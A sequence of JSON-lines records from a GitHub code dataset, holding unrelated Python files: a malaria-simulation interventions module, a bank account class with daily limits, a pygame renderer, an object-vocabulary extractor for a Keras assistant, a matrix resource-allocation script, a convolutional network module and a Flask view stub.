received_test_event=\"DT1_Done\",\n nodeIDs=[1, 2],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_DT1'}])\n add_diagnostic_survey(cb=cb, start_day=250, repetitions=400, tsteps_btwn_repetitions=5,\n diagnostic_type=\"PCR_PARASITES\", diagnostic_threshold=DT2, sensitivity=Sens2, specificity=Spec2,\n event_name=\"DT2\", received_test_event=\"DT2_Done\",\n nodeIDs=[1, 2],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_DT2'}])\n\n return {\n 'MTTT_Coverage': coverage\n }\n\n\n\n\n\ndef smc_adherent_configuration(cb, adherence):\n smc_adherent_config = configure_adherent_drug(cb,\n doses=[[\"Sulfadoxine\", \"Pyrimethamine\",'Amodiaquine'],\n ['Amodiaquine'],\n ['Amodiaquine']],\n dose_interval=1,\n non_adherence_options=['Stop'],\n non_adherence_distribution=[1],\n adherence_config={\n \"class\": \"WaningEffectMapCount\",\n \"Initial_Effect\": 1,\n \"Durability_Map\": {\n \"Times\": [\n 1.0,\n 2.0,\n 3.0\n ],\n \"Values\": [\n 1,\n adherence,\n adherence\n ]\n }\n }\n )\n return smc_adherent_config\n\n\n\ndef health_seeking(cb, kid_coverage, adult_scalar=0.6, start_day=0, nodeIDs=None) :\n\n school_age_scalar = 1 - ((1 - adult_scalar)*0.5)\n coverage_dict = [\n {'agemin' : 0,\n 'agemax' : 5,\n 'trigger' : 'NewClinicalCase',\n 'coverage' : kid_coverage,\n 'seek' : 1,\n 'rate' : 0.3},\n {'agemin': 5,\n 'agemax': 15,\n 'trigger': 'NewClinicalCase',\n 'coverage': kid_coverage*school_age_scalar,\n 'seek': 1,\n 'rate': 0.3},\n {'agemin': 15,\n 'agemax': 120,\n 'trigger': 'NewClinicalCase',\n 'coverage': kid_coverage*adult_scalar,\n 'seek': 1,\n 'rate': 0.3},\n {'agemin': 0,\n 'agemax': 120,\n 'trigger': 'NewSevereCase',\n 'coverage': max([0.8, kid_coverage]),\n 'seek': 1,\n 'rate': 0.2},\n ]\n\n add_health_seeking(cb, start_day=start_day, targets=coverage_dict, drug=[\"Artemether\", \"Lumefantrine\"],\n nodeIDs=nodeIDs)\n return {\n 'child_coverage' : kid_coverage,\n 'adult_coverage' : kid_coverage*adult_scalar\n }\n\n\ndef add_health_seeking_from_df(cb, start_day, hs_df, adult_scalar=0.6) :\n\n for r, row in hs_df.iterrows() :\n health_seeking(cb, start_day=start_day, kid_coverage=row['child_coverage'],\n nodeIDs=[int(row['node'])], adult_scalar=adult_scalar)\n return {\n 'node_%d_hs' % row['node'] : row['child_coverage'] for r, row in hs_df.iterrows()\n }\n\n\ndef read_in_habitat_from_baseline_calib(habs_to_run_fname, numsamples) :\n\n adf = pd.read_csv(os.path.join(projectpath, 'simulation_output', 'baseline', habs_to_run_fname))\n df = pd.DataFrame()\n for node, ndf in adf.groupby('node') :\n sdf = copy.copy(ndf.sort_values(by='diff').head(numsamples))\n sdf = sdf.reset_index()\n sdf['rank'] = sdf.index\n df = pd.concat([df, sdf])\n df['NodeID'] = df['node']\n df['habitat_scale'] = df['x_Temporary_Larval_Habitat']\n\n return df\n\n\ndef add_special_migration(cb):\n # Set Is_Moving = False\n # Set Dont_Allow_Duplicates = False\n mig_events = pd.read_csv(os.path.join('%s' % projectpath, 'simulation_inputs', 'migration',\n 'migration_ledgers_events.csv'))\n for index, row in mig_events.iterrows():\n start = int(row[\"start_day\"])\n ledger = str(row[\"ledger\"])\n node_from = int(row[\"node_from\"])\n node_to = int(row[\"node_to\"])\n at_node = int(row[\"at_node\"])\n\n duration_at_node = {\"Duration_At_Node_Distribution\": \"CONSTANT_DISTRIBUTION\",\n \"Duration_At_Node_Constant\": at_node}\n duration_before_leaving = {\"Duration_Before_Leaving_Distribution\": \"CONSTANT_DISTRIBUTION\",\n \"Duration_Before_Leaving_Constant\": 10}\n duration_before_leaving = {\"Duration_Before_Leaving_Distribution\": \"UNIFORM_DISTRIBUTION\",\n \"Duration_Before_Leaving_Min\": 15,\n \"Duration_Before_Leaving_Max\": 112}\n\n add_migration_event(cb,\n start_day=start,\n nodesfrom=[node_from],\n nodeto=node_to,\n coverage=1.0,\n duration_at_node=duration_at_node,\n duration_before_leaving=duration_before_leaving,\n ind_property_restrictions=[{\"Ledger\": ledger}],\n repetitions=1)","repo_name":"laurettemhlanga/emodtrials","sub_path":"interventions.py","file_name":"interventions.py","file_ext":"py","file_size_in_byte":14539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31468396002","text":"from quinterac.Errors import *\n\n\nclass Account:\n\n def __init__(self, accountNumber, accountName, isNewAccount=None, balance=0):\n self.accountNumber = accountNumber\n self.accountName = accountName\n self.balance = int(balance)\n self.totalDeposited = 0\n self.totalWithdrawn = 0\n self.totalTransferred = 0\n self.isNewAccount = isNewAccount\n\n def deposit(self, amount, isAtm):\n if self.isNewAccount:\n return Error.newAccount\n\n if self.totalDeposited + int(amount) <= DailyLimits.getDepositLimit(isAtm):\n self.totalDeposited += int(amount)\n self.updateBalance(int(amount))\n return True\n\n return Error.overDepositLimit\n\n def withdraw(self, amount, isAtm):\n if self.isNewAccount:\n return Error.newAccount\n\n if self.totalWithdrawn + int(amount) <= DailyLimits.getWithdrawalLimit(isAtm):\n self.totalWithdrawn += int(amount)\n self.updateBalance(-int(amount))\n return True\n\n return Error.overWithdrawalLimit\n\n def transfer(self, amount, isAtm):\n if self.isNewAccount:\n return Error.newAccount\n\n if self.totalTransferred + int(amount) <= DailyLimits.getTransferLimit(isAtm):\n self.totalTransferred += int(amount)\n self.updateBalance(-int(amount))\n return True\n\n return Error.overTransferLimit\n\n def updateBalance(self, newValue):\n if (int(self.balance) + int(newValue)) < 0:\n return Error.negativeBalance\n\n self.balance += int(newValue)\n return None\n\n def __lt__(self, other):\n return self.accountNumber < other.accountNumber\n\n def __gt__(self, other):\n return self.accountNumber > other.accountNumber\n\nclass DailyLimits:\n accounts = []\n\n @staticmethod\n def loadAccounts(fileName):\n try:\n accountsFile = open(fileName, 'r')\n if accountsFile:\n lines = accountsFile.readlines()\n for line in lines:\n line = line.strip()\n if line != \"0000000\":\n account = Account(line, \"\", False)\n DailyLimits.accounts.append(account)\n else:\n accountsFile = open(fileName, 'w+')\n accountsFile.close()\n\n except FileNotFoundError:\n DailyLimits.accounts = []\n\n @staticmethod\n def addAccount(account):\n\n DailyLimits.accounts.append(account)\n\n @staticmethod\n def getDepositLimit(isAtm):\n return 500000 if isAtm else 99999999\n\n @staticmethod\n def getWithdrawalLimit(isAtm):\n return 500000 if isAtm else 99999999\n\n @staticmethod\n def getTransferLimit(isAtm):\n return 1000000 if isAtm else 99999999\n\n @staticmethod\n def getAccountFor(accountNumber):\n for account in DailyLimits.accounts:\n if account.accountNumber == accountNumber:\n return account\n\n return None\n","repo_name":"asaferrosenthal/bat-quinterac","sub_path":"quinterac/Account.py","file_name":"Account.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39752797107","text":"import pygame\r\n\r\nclass RenderClearBg(pygame.sprite.RenderPlain):\r\n def draw(self, surface):\r\n for s in self.spritedict.keys():\r\n if not s.bg_prepared:\r\n s.bg = pygame.Surface(s.rect.size)\r\n s.bg.blit (surface, (0,0), s.rect)\r\n s.bg_prepared = True\r\n \r\n if s.dirty:\r\n surface.blit (s.bg, s.old_pos)\r\n \r\n if s.bg.get_rect().size != s.rect.size: s.bg = pygame.Surface(s.rect.size)\r\n \r\n s.bg.blit (surface, (0,0), s.rect)\r\n surface.blit (s.image, s.rect.topleft)\r\n s.dirty = False\r\n #pygame.sprite.RenderClear.draw(self, surface)\r\n \r\n #def clear(self, surface):\r\n # for s, r in self.spritedict.items():\r\n # surface.blit (s.bg, s.rect.topleft)","repo_name":"xebecnan/our-gathering","sub_path":"src/client/renderclearbg.py","file_name":"renderclearbg.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34087692085","text":"\"\"\"\nGlobal vocab managing utilities.\n\nEssential question: what does CrooshToost know about for this session? The utilities in this module are for\nanswering the more specific question: what vocabulary is CrooshToost familiar with in this session. This includes\nmodel names, model layer names, model callbacks, model parameters, etc.\n\n\"Vocabulary\" in CrooshToost refers to anything that can be operated on/with corresponding to the current model.\nThis can include parameter names, attribute names, method names, method argument names, etc.\n\"\"\"\n\n# Idea\n# I think internally the vocabulary should be stored as a sort of graph of relations between\n# names and objects. For example, \"model.layers\" should be stored as an IS_ATTR_OF relation\n# connecting \"layers\" to \"model\" (directed). \"node_index\" should be stored as an IS_ARG_OF\n# relation connecting \"node_index\" to \"get_input_mask_at\", which is itself stored as an\n# IS_METHOD_OF relation connecting \"get_input_mask_at\" to \"model\".\n#\n# The types of relationships the graph maintains can then be used to search for likely objects\n# or commands matching noun-phrases and intent extracted from the user input. They will also\n# help to structure the execution of the command itself.\n\n# TODO: Figure out how \"possible\" it is to automatically monitor mutable objects for changes in\n# their __dict__.\n# Interesting Fact: most objects' __dict__'s are *not* readonly ;)\n\nfrom .vocab_graph import VocabGraph, WordRelations\nfrom ..globals import GLOBALS\n\nfrom platform import python_version\n\nimport inspect\nimport numpy as np\nimport tensorflow as tf\nimport types, typing\n\nif python_version() < '3.6':\n # Easiest examples I could find of each\n typing_MethodDescriptorType = None # Still not sure\n typing_MethodWrapperType = type(\"\".__repr__)\n typing_WrapperDescriptorType = type(str.__repr__)\nelse:\n typing_MethodDescriptorType = typing.MethodDescriptorType\n typing_MethodWrapperType = typing.MethodWrapperType\n typing_WrapperDescriptorType = typing.WrapperDescriptorType\n\n_DEFAULT_VOCAB = [\n # Default vocabulary to include.\n]\n\n# These are types to ignore exploring further. They don't have \"unusual\" attributes\n# that we wish to explore and add to our vocabulary.\n#\n# There are tons of other classes we could be checking here, but for now lets just assume\n# that anything beyond this list is considered \"interesting\".\n_BASE_TYPES = {\n bool, int, float, complex, str,\n np.int8, np.int16, np.int32, np.int64,\n np.uint8, np.uint16, np.uint32, np.uint64,\n np.float16, np.float32, np.float64, np.double,\n np.long, np.longcomplex, np.longdouble, np.longlong,\n bytes, bytearray, memoryview, type, property,\n list, tuple, range, dict, set, frozenset,\n type(...), type(NotImplemented), # type(None), Not too sure about type(None) yet...\n types.BuiltinFunctionType,\n types.BuiltinMethodType,\n types.CodeType,\n types.CoroutineType,\n types.FrameType,\n types.GeneratorType,\n types.MappingProxyType,\n types.ModuleType, # TODO: probably should explore modules?\n types.SimpleNamespace,\n types.TracebackType,\n typing_MethodDescriptorType,\n typing_MethodWrapperType,\n typing_WrapperDescriptorType,\n tf.dtypes.DType\n}\n\n_function_type = types.FunctionType\n_lambda_type = types.LambdaType\n_method_type = types.MethodType\n\n_FUNCTION_TYPES = {\n _function_type,\n _lambda_type,\n _method_type,\n type # we check classes as well because their __init__ methods might have important vocabulary\n}\n\n# Maximum recursion depth of objects to explore when looking for vocabulary\n_MAX_RECURSION_DEPTH = 2\n\n# Maximum length of an iterable to explore\n_MAX_ITERABLE_LEN = 50\n\n# The name format for items found in literals\n_ITERABLE_ITEM_NAME_FORMAT = \"%s_Item\"\n\ndef _is_base_type(t):\n return t in _BASE_TYPES or any(issubclass(t, x) for x in _BASE_TYPES)\n\ndef _is_function_type(t):\n return any(issubclass(t, x) for x in _FUNCTION_TYPES)\n\ndef _is_magic_name(name):\n return name.startswith(\"__\")\n\ndef _is_private_name(name):\n \"\"\"\n Check if `name` starts with a single underscore. Note that this will return *False*\n for magic names like \"__init__\".\n \"\"\"\n return name.startswith(\"_\") and not _is_magic_name(name)\n\ndef _extract_vocab_recursive(obj, vg, context, depth=0):\n # Algorithm: For now, iterate recursively through every object's \"dir\".\n #\n # If a name is private (starts with a single underscore), we ignore it only if there's\n # an equivalent non-private name in the object dir. An example of this is tensorflow's\n # Operation._node_def, which has corresponding public attribute Operation.node_def.\n #\n # If an object is of type list, dict, or tuple, then the recursive extraction also applies\n # to each of the objects in the iterable (we limit the discovery to these types because these\n # are the safest classes to iterate over).\n #\n # If an object is of type string, and the string is non-empty, then the value of the \n # string is added to the vocab as well.\n #\n # If an object is a function type, inspect its arguments. If the object has **kwargs,\n # we can try to guess some of the parameters by looking at the object's __doc__.\n \n if depth >= _MAX_RECURSION_DEPTH or _is_base_type(type(obj)):\n return\n\n obj_dir = dir(obj)\n for name in obj_dir:\n if _is_magic_name(name):\n # Ignore magic stuff.\n continue\n\n if _is_private_name(name) and name[1:] in obj_dir:\n # Check here for private names with public counterparts\n continue\n \n attr = None\n try:\n attr = getattr(obj, name)\n except AttributeError:\n # Sometimes keras will throw an AttributeError for values that aren't initialized\n # yet in the current tensorflow session.\n continue\n finally:\n # TODO: We should really also store a list of \"ignore\" types, for which we don't add the name.\n relation_type = WordRelations._get_attr_rel(attr_type)\n next_context = vg.add_node(name, context, relation_type)\n\n attr_type = type(attr)\n if (_is_base_type(attr_type) or _is_function_type(attr_type)) and attr is not None:\n\n # TODO: What happens if this list gets added to or removed from?\n\n # Note: when entering an iterable to search for new items, we actually increment\n # the depth by 2, since we're entering both the iterable attribute itself _and_\n # it's items. \n if issubclass(attr_type, dict) and len(attr) <= _MAX_ITERABLE_LEN:\n for key, value in attr.items():\n if _is_private_name(name) or _is_magic_name(name):\n continue\n\n if _is_base_type(type(value)):\n continue\n # We build a node for the keyword itself built off the current context\n kw_context = vg.add_node(key, next_context, WordRelations.IS_ELEM_OF_D)\n\n _extract_vocab_recursive(value, vg, kw_context, depth+2)\n\n elif issubclass(attr_type, (list, tuple)) and len(attr) <= _MAX_ITERABLE_LEN:\n # TODO: This is REALLY fucky. The name given to items in a list is \"list_name[index]\". What if\n # the index of the item changes? I think a few things have to happen. First, lists and tuples\n # should be handled differently, since tuples are immutable (but can still be appended to\n # apparently with +). Second, the node name given to items found in the iterable should _not_\n # be dependent on the item's position in the iterable (unless, _maybe_ for tuples).\n for i, item in enumerate(attr):\n if _is_base_type(type(item)):\n continue\n\n node_name = _ITERABLE_ITEM_NAME_FORMAT % name\n elem_context = vg.add_node(node_name, next_context, WordRelations.IS_ELEM_OF_L)\n _extract_vocab_recursive(item, vg, elem_context, depth + 2)\n \n elif attr_type == str and attr:\n # The reason we do this is so that we can pick up on things like object names or keywords.\n # For example, if we asked \"What is the learning rate of model CNN1?\", it wouldn't be enough\n # to know that 'model' has a parameter 'name', we would also need to know that that specific\n # model's 'name' is equal to \"CNN1\" (or close enough).\n vg.add_node(attr, next_context, WordRelations.IS_VALUE_OF)\n\n elif _is_function_type(attr_type):\n try:\n parameters = inspect.signature(attr).parameters\n except ValueError: # Sometimes no signature is found. Happens occasionally for weird tf objects\n continue\n\n learn_from_doc = False\n for param_name, param in parameters.items():\n # If the name is \"args\" or \"kwargs\", then typically the list of valid keyword argument\n # names can be found somewhere in the function's docstring (assuming it's well documented).\n if (param_name == \"args\" and param.kind == inspect.Parameter.VAR_POSITIONAL) or \\\n (param_name == \"kwargs\" and param.kind == inspect.Parameter.VAR_KEYWORD):\n learn_from_doc = True\n continue\n\n relation_type = WordRelations.IS_ARG_OF\n if (param.kind == inspect.Parameter.VAR_POSITIONAL):\n relation_type = WordRelations.IS_VARG_OF\n elif (param.kind == inspect.Parameter.KEYWORD_ONLY):\n relation_type = WordRelations.IS_KWARG_OF\n elif (param.kind == inspect.Parameter.VAR_KEYWORD):\n relation_type = WordRelations.IS_VKWARG_OF\n\n vg.add_node(param_name, next_context, relation_type)\n\n if learn_from_doc:\n _learn_kwargs_from_doc(attr.__doc__, vg)\n else:\n # If this attribute isn't one of the base type cases above, \n # continue searching through it's __dict__ for vocab.\n _extract_vocab_recursive(attr, vg, next_context, depth+1)\n\n # Now the fun stuff. We inject our own __getattribute__, __setattr__,\n # and __delattr__ into each object to dynamically update the vocab\n # graph.\n #\n # This does introduce significant overhead, and so can be turned off\n # with the global attribute ENABLE_DYNAMIC_VOCAB_UPDATES.\n if not GLOBALS.ENABLE_DYNAMIC_VOCAB_UPDATES:\n return\n\n\n # TODO: _inject_dynamic_vocab_updates should also be called on objects\n # of types (dict, list, tuple), which are handled separately above\n _inject_dynamic_vocab_updates(obj, vg, context)\n\ndef _learn_kwargs_from_doc(docstr, vg):\n # TIME FOR SOME NLP :O\n if not docstr:\n return\n\nclass _DynamicVocabWatcher:\n \"\"\"\n Empty base class for checking if we've already injected \n our dynamic vocab updating code into an object.\n \"\"\"\n pass\n\ndef _inject_dynamic_vocab_updates(obj, vg, context):\n \"\"\"Inject code into obj to dynamically watch changes to the object's __dict__.\"\"\"\n # WARNING: This code is ugly and magical.\n\n if isinstance(obj, _DynamicVocabWatcher):\n # Already injected dynamic vocab watching into the object.\n return\n \n # __slots__ indicates which attributes an object has access to. If __slots__ is set and\n # __slots__ doesn't contain __dict__, then the object's list of accessible attributes\n # won't change, meaning we don't need to worry about dynamically updating the vocab graph.\n #\n # Even if the object has __slots__ without __dict__, setting an attribute to a new \n # value still warrants updating the vocab graph, meaning we still have to override\n # __setattr__.\n has_immutable_slots = hasattr(obj, \"__slots__\") and \"__dict__\" not in obj.__slots__\n\n # Notes\n # =====\n # IMPORTANT NOTE: Inside the new _getattr, _setattr_, _delattr, we *can't* use\n # hasattr, getattr, setattr, or delattr, as this will create an infinite loop.\n\n # If the object has __getattr__, then this will be called ONLY when the attribute\n # being retrieved is _not_ already an attribute of the object. Hence, if we're\n # inside __getattr__, then hasattr(self, name) is implicitly False.\n\n # It may not seem like we have to worry about __getattr__ or __getattribute__ (since when\n # does the _retrieval_ of an attribute change the object's dict?), however there is a chance\n # the class has a __getattr__ override that does something magical like automatically returning\n # None regardless of whether or not the attribute is defined.\n\n object_getattr = object.__getattribute__ # This is the most basic \"getattr\" that doesn't involve any magic\n\n NoAttribute, NoItem = object(), object() # Unique identifiers\n\n _getattr_old = obj.__getattr__ if hasattr(obj, \"__getattr__\") else None\n _setattr_old = obj.__setattr__\n _delattr_old = obj.__delattr__\n \n def _getattr(self, name):\n # TODO: Do stuff in here.\n return _getattr_old(name)\n\n if has_immutable_slots:\n # If the object has immutable slots we can speed this up a ton by avoiding the\n # unnecessary try-except block.\n def _setattr(self, name, value):\n retrieved = object_getattr(self, name)\n if type(retrieved) != type(value):\n vg.remove_node_by_value(\n name, context, \n recursive=True,\n initial_relation=WordRelations._get_attr_rel(type(retrieved)))\n if not _is_base_type(type(value)):\n vg.add_node(name, context, WordRelations._get_attr_rel(type(value)))\n _setattr_old(name, value)\n else:\n def _setattr(self, name, value):\n try:\n retrieved = object_getattr(self, name)\n except:\n retrieved = NoAttribute\n val_type = type(value)\n if retrieved == NoAttribute and not _is_base_type(val_type):\n vg.add_node(name, context, WordRelations._get_attr_rel(val_type))\n elif type(retrieved) != val_type:\n vg.remove_node_by_value(\n name, context, \n recursive=True, \n initial_relation=WordRelations._get_attr_rel(type(retrieved)))\n if not _is_base_type(val_type):\n vg.add_node(name, context, WordRelations._get_attr_rel(val_type))\n _setattr_old(name, value)\n \n def _delattr(self, name):\n try:\n retrieved = object_getattr(self, name)\n except AttributeError:\n # if we can't retrieve the object then we can't delete it either\n # so just call delattr and throw the error regardless.\n pass\n _delattr_old(name)\n vg.remove_node_by_value(\n name, context, \n recursive=True, \n initial_relation=WordRelations._get_attr_rel(type(retrieved)))\n\n _setitem = _delitem = None\n if isinstance(obj, (dict, list, tuple)):\n if isinstance(obj, (list, tuple)):\n node_name = _ITERABLE_ITEM_NAME_FORMAT % context.value\n new_node_format = lambda item: node_name\n word_relation = WordRelations.IS_ELEM_OF_L\n else:\n new_node_format = lambda item: item\n word_relation = WordRelations.IS_ELEM_OF_D\n _getitem_old = obj.__getitem__\n _setitem_old = obj.__setitem__\n _delitem_old = obj.__delitem__\n def _setitem(self, item, value):\n try:\n retrieved = _getitem_old(item)\n except:\n retrieved = NoItem\n val_type = type(value)\n if retrieved == NoItem and not _is_base_type(val_type):\n vg.add_node(new_node_format(item), context, word_relation)\n else:\n if type(retrieved) != val_type:\n vg.remove_node_by_value(\n new_node_format(item), context, \n recursive=True, \n initial_relation=word_relation)\n if not _is_base_type(val_type):\n vg.add_node(new_node_format(item), context, word_relation)\n _setitem_old(item, value)\n\n def _delitem(self, item):\n _delitem_old(item)\n vg.remove_node_by_value(\n new_node_format(item), context, \n recursive=True, \n initial_relation=word_relation)\n\n new__dict__ = {\n \"__getattr__\" : _getattr,\n \"__setattr__\" : _setattr,\n \"__delattr__\" : _delattr\n }\n if _setitem:\n new__dict__[\"__setitem__\"] = _setitem\n if _delitem:\n new__dict__[\"__delitem__\"] = _delitem\n\n try:\n # Magic\n obj.__class__ = type(\n \"_%s\" % obj.__class__.__name__,\n (obj.__class__, _DynamicVocabWatcher),\n new__dict__\n )\n except:\n # Sometimes an object's metaclass prevents it from being subclassed, preventing the\n # above trick from working. If this is the case, then maybe there's something else\n # we can do?\n \n # TODO (low priority): Figure out if there's some other way to monitor updates dynamically.\n return\n\nclass VocabExtractor:\n \"\"\"\n A VocabExtractor maintains a Vocabulary for a CrooshToost session, with a Vocabulary consisting\n of a set of words CrooshToost is familiar with related to the current session's model.\n \"\"\"\n\n def __init__(self):\n self.vocab = VocabGraph(_DEFAULT_VOCAB[::])\n\n def extract_initial_vocab(self, model):\n model_node = self.vocab.add_node(model.name, None, None)\n\n # Model Layers\n for layer in model.layers:\n self.vocab.add_node(\n layer.name, model_node, WordRelations.IS_KERAS_LAYER_OF)\n\n # List of the callbacks\n if (hasattr(model, \"callbacks\")):\n # TODO: Ensure models managed by CT have a \"callbacks\" attribute.\n for callback in model.callbacks: # `model.callbacks` doesn't exist in keras!\n self.vocab.add_node(\n type(callback).__name__, model_node, WordRelations.IS_KERAS_CALLBACK_OF)\n\n _extract_vocab_recursive(model, self.vocab, model_node)\n \n def follow(self, dict, contexts={}):\n \"\"\"\n At certain CrooshToost managed pieces of code (model fitting, preprocessing code run in CT, etc.),\n VocabExtractor.follow(dict, contexts) is used to add potentially new vocabulary to the currently\n maintained vocabulary along with the context(s) in which that vocabulary is found.\n\n The idea of this method is to \"decorate\" important function calls. So for example, instead of calling\n\n model.fit(x=inputs, y=outputs, batch_size=4, epochs=50, callbacks=callbacks)\n\n you would call\n model.fit(\n vocab_extractor.follow(\n {\"x\" : inputs, \"y\" : outputs, \"batch_size\" : 4, \"epochs\" : 50, \"callbacks\" : callbacks},\n contexts=contexts))\n \"\"\"\n\n # TODO: Implement this properly\n # TODO: Figure out what \"contexts\" should be, or if it's even necessary.\n raise NotImplementedError\n # return dict # Eventually\n \nif __name__ == \"__main__\":\n # quick testing utilities\n\n def test_keras():\n from pprint import pprint\n from keras.models import Model\n from keras.layers import Input, Dense, Softmax\n from keras.callbacks import LearningRateScheduler, TensorBoard, LambdaCallback\n from keras.optimizers import SGD\n\n x = inputs = Input(shape=(10,))\n x = Dense(40)(x)\n x = Dense(10)(x)\n x = Softmax()(x)\n\n model = Model(inputs=inputs, outputs=x)\n\n model.callbacks = [\n LearningRateScheduler(schedule = lambda epoch: 1/(1 + epoch)**.55),\n TensorBoard(),\n LambdaCallback(on_epoch_begin=lambda epoch, logs={}: None)\n ]\n\n sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(loss='mse', optimizer=sgd)\n\n vocab_extractor = VocabExtractor()\n vocab_extractor.extract_initial_vocab(model)\n\n pprint(vocab_extractor.vocab)\n \n def test_vg():\n class A:\n def __init__(self, attr1, attr2):\n self.attr1 = attr1\n self.attr2 = attr2\n\n def method_1(self):\n pass\n\n def method_2(self, arg1, arg2):\n pass\n\n class B:\n def __init__(self):\n self.property = \"Hey!\"\n \n def method_1(self, thing):\n pass\n\n class C:\n def __init__(self):\n self.dict = {\n \"Entry 1\" : 1,\n \"Entry 2\" : 2\n }\n self.list = [D(), E()]\n\n self.function = lambda hey, you, *args, **kwargs: None\n\n class D:\n cls_thing = \":O\"\n \n class E:\n def __init__(self):\n self.a = A(1, 2)\n\n a = A(B(), C())\n\n from pprint import pprint\n vg = VocabGraph([])\n root_node = vg.add_node(\"a\", None, None)\n _extract_vocab_recursive(a, vg, root_node)\n pprint(vg._graph_by_values)\n\n test_vg()","repo_name":"michaelala25/crooshtoost","sub_path":"crooshtoost/language_processing/vocab_extractor.py","file_name":"vocab_extractor.py","file_ext":"py","file_size_in_byte":21696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8546871067","text":"matrix = [[0, 1, 0, 1, 0],\r\n [1, 0, 1, 1, 1],\r\n [0, 0, 0, 0, 1],\r\n [1, 1, 0, 0, 0],\r\n [0, 1, 1, 1, 0]]\r\n\r\n\r\n# control function\r\ndef plan(matrix):\r\n resources = []\r\n requests = []\r\n for i in range(len(matrix)):\r\n resources.append(i)\r\n requests.append(i)\r\n\r\n for i in range(len(matrix)):\r\n # find min row and swap it with first\r\n row_index = search_min_row(matrix, i)\r\n swap_rows(matrix, i, row_index)\r\n resources[i], resources[row_index] = resources[row_index], resources[i]\r\n\r\n # find min column where first element is 1 and swap it with first column\r\n column_index = search_min_column(matrix, i)\r\n swap_columns(matrix, i, column_index)\r\n requests[i], requests[column_index] = requests[column_index], requests[i]\r\n\r\n\r\n print(\"Send request %s to resource %s\" % (requests[i], resources[i]))\r\n\r\n\r\n\r\ndef print_matrix(matrix):\r\n for i in matrix:\r\n print(i)\r\n\r\n\r\n# search row with min count of 1 in submatrix\r\ndef search_min_row(matrix, start): # start - variable that help define submatrix\r\n min = len(matrix)\r\n row_index = -1\r\n for i in range(start, len(matrix)):\r\n a = sum(matrix[i][start::])\r\n if a < min:\r\n min = a\r\n row_index = i\r\n return row_index\r\n\r\n\r\n# search column with min sum that start with 1\r\ndef search_min_column(matrix, start):\r\n min = len(matrix)\r\n column_index = -1\r\n for i in range(start, len(matrix)):\r\n if matrix[start][i] == 1:\r\n a = sum(matrix[x][i] for x in range(start, len(matrix)))\r\n if a < min:\r\n min = a\r\n column_index = i\r\n return column_index\r\n\r\n\r\n# changes the columns in places\r\ndef swap_columns(matrix, a, b):\r\n for i in range(len(matrix)):\r\n matrix[i][a], matrix[i][b] = matrix[i][b], matrix[i][a]\r\n\r\n\r\n# changes the rows in places\r\ndef swap_rows(matrix, a, b):\r\n matrix[a], matrix[b] = matrix[b], matrix[a]\r\n\r\n\r\n# # set all elements in first row and first column of submatrix as 0 except first element that is 1\r\n# def set_zeroes(matrix, start):\r\n# matrix[start][start] = 1\r\n# for i in range(start + 1, len(matrix)):\r\n# matrix[start][i] = 0\r\n# matrix[i][start] = 0\r\n#\r\n#\r\n# # represent matrix in comfortable format\r\n# def sort_matrix(arr, matrix, type):\r\n# for i in range(len(arr) - 1):\r\n# for j in range(i + 1, len(arr)):\r\n# if arr[i] > arr[j]:\r\n# arr[i], arr[j] = arr[j], arr[i]\r\n# swap_rows(matrix, i, j) if type == 1 else swap_columns(matrix, i, j)\r\n\r\n\r\nprint(\"Start matrix:\")\r\nprint_matrix(matrix)\r\nprint()\r\n\r\nplan(matrix)","repo_name":"Siusarna/Lab4","sub_path":"lab4.py","file_name":"lab4.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21015586033","text":"import torch.nn as nn\nimport torch\nimport numpy as np\n\n__all__ = ['Conv']\n\n\nclass DepthwiseSeparableConv1d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, padding):\n super(DepthwiseSeparableConv1d, self).__init__()\n self.block = nn.Sequential(\n nn.Conv1d(in_channels=in_channels, \n out_channels=in_channels,\n kernel_size=kernel_size, \n padding=padding,\n groups=in_channels), \n nn.Conv1d(in_channels=in_channels, \n out_channels=out_channels,\n kernel_size=1), \n nn.LeakyReLU(negative_slope=0.1, \n inplace=True)\n )\n\n def forward(self, x):\n return self.block(x)\n\n\nclass Conv(nn.Module):\n \"\"\" Convolutional architecture with variable receptive field.\n \"\"\"\n\n def __init__(self, \n receptive_field, \n points_per_unit, \n num_layers, \n num_channels):\n super(Conv, self).__init__()\n\n kernel_size = self._compute_kernel_size(receptive_field, \n points_per_unit, \n num_layers)\n\n print(f'kernel size = {kernel_size}')\n padding = kernel_size // 2\n\n layers = []\n\n for _ in range(num_layers):\n layers += [DepthwiseSeparableConv1d(num_channels, \n num_channels, \n kernel_size, \n padding)]\n\n self.net = nn.Sequential(*layers)\n\n self.num_halving_layers = 0\n self.in_channels = num_channels\n self.out_channels = num_channels\n self.num_channels = num_channels\n\n def forward(self, x):\n output = self.net(x)\n return output\n\n @staticmethod\n def _compute_kernel_size(receptive_field, points_per_unit, num_layers):\n receptive_points = receptive_field * points_per_unit\n kernel_size = 1 + (receptive_points - 1) / num_layers\n return int(np.ceil(kernel_size) // 2 * 2 + 1)\n\n @property\n def num_params(self):\n \"\"\"Number of parameters in model.\"\"\"\n return np.sum([torch.tensor(param.shape).prod()\n for param in self.parameters()])\n","repo_name":"ashysheya/Neural_CDE_CNP","sub_path":"lib/architectures.py","file_name":"architectures.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23584772688","text":"'''\nAWSのページを表示する\n'''\nfrom flask import Blueprint\nfrom flask import render_template\nimport app.views.template as template\nimport app.models.aws as model\n\nview = Blueprint('aws',\n __name__,\n url_prefix='/aws')\n\n@view.route('/')\n@view.route('/')\ndef show(id=None):\n if id:\n # 記事単体\n return template.render('aws/show.html', \n content=model.get_content(id))\n 